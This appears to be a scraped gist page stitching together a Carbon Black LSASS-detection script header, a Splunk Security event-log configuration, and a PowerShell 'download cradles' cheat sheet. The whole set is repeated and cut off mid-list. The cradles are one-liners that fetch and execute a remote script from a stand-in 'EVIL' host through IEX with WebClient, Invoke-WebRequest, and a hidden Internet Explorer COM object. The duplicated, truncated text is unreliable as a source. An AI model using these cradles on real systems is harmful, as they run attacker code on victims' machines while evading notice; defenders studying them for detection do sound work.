spankowitz

## cbapi-ps-lsass-loop.py
# Carbon Black Evil PowerShell LSASS Query
#
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe
#
# Author: Jason Lang (@curi0usJack)
#
# Prereqs (Windows 10)
#	Install bash on Win10
#	sudo apt-get install python-pip
#	sudo pip install --upgrade requests

## inputs.conf
[WinEventLog://Security]
disabled = 0
start_from = oldest
current_only = 0
evt_resolve_ad_obj = 1
checkpointInterval = 5
blacklist1 = EventCode="4662" Message="Object Type:(?!\s*groupPolicyContainer)"
blacklist2 = EventCode="566" Message="Object Type:(?!\s*groupPolicyContainer)"
blacklist3 = EventCode="4688" Message="New Process Name:\s*(?i)(?:[C-F]:\\Program Files\\Splunk(?:UniversalForwarder)?\\bin\\(?:btool|splunkd|splunk|splunk\-(?:MonitorNoHandle|admon|netmon|perfmon|powershell|regmon|winevtlog|winhostinfo|winprintmon|wmi|optimize))\.exe)"
blacklist4 = EventCode="4689" Message="Process Name:\s*(?i)(?:[C-F]:\\Program Files\\Splunk(?:UniversalForwarder)?\\bin\\(?:btool|splunkd|splunk|splunk\-(?:MonitorNoHandle|admon|netmon|perfmon|powershell|regmon|winevtlog|winhostinfo|winprintmon|wmi|optimize))\.exe)"

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
	# Carbon Black Evil PowerShell LSASS Query
	#
	# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe
	#
	# Author: Jason Lang (@curi0usJack)
	#
	# Prereqs (Windows 10)
	# Install bash on Win10
	# sudo apt-get install python-pip
	# sudo pip install --upgrade requests
	[WinEventLog://Security]
	disabled = 0
	start_from = oldest
	current_only = 0
	evt_resolve_ad_obj = 1
	checkpointInterval = 5
	blacklist1 = EventCode="4662" Message="Object Type:(?!\s*groupPolicyContainer)"
	blacklist2 = EventCode="566" Message="Object Type:(?!\s*groupPolicyContainer)"
	blacklist3 = EventCode="4688" Message="New Process Name:\s*(?i)(?:[C-F]:\\Program Files\\Splunk(?:UniversalForwarder)?\\bin\\(?:btool\|splunkd\|splunk\|splunk\-(?:MonitorNoHandle\|admon\|netmon\|perfmon\|powershell\|regmon\|winevtlog\|winhostinfo\|winprintmon\|wmi\|optimize))\.exe)"
	blacklist4 = EventCode="4689" Message="Process Name:\s*(?i)(?:[C-F]:\\Program Files\\Splunk(?:UniversalForwarder)?\\bin\\(?:btool\|splunkd\|splunk\|splunk\-(?:MonitorNoHandle\|admon\|netmon\|perfmon\|powershell\|regmon\|winevtlog\|winhostinfo\|winprintmon\|wmi\|optimize))\.exe)"
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object